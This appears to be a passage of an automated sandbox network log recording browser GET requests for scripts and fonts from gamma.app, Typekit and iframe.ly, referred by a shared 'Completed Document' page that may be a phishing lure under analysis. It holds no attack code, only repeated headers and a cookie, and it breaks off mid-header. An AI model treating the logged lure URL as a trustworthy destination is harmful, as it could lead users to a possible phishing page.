zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-5cbe58b6145af398.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-37f49d3b6c419859.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /tiw2cwq.css HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /embed.js HTTP/1.1Host: cdn.iframe.lyConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/93656207-5a8710788d43745e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/b4d7d80c-b21e42481057053e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/ad54e6ef-c1497d83c32edce5.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2edb282b-c727a725ba9cab5d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/b155a556-6216235a369a735d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/d08a6a05-cd94e662b24272fc.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /p.css?s=1&k=tiw2cwq&ht=tk&f=10870.10872.10873.10874.28201.28205.28208.28222.28225.28226.28227.28238.32157.32159.32163.32164&a=2326044&app=typekit&e=css HTTP/1.1Host: p.typekit.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://use.typekit.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1035ef44-a82a0e0646431fa5.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/b779bb5e-79de22188ac69032.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/91bbf309-32a6ed56d98fa368.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8c469d57-125fc4e271dbee1b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5adc83ef-bcbc74c04583414c.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/b13ba9de-693ee4b2b0cb0b28.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9b583bcd-e94a9f27afcc219c.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/69bd6bf3-8eac31bce3de269a.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/998ccc15-d28324c84824644b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/a29ae703-7accb437ac3a87e9.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 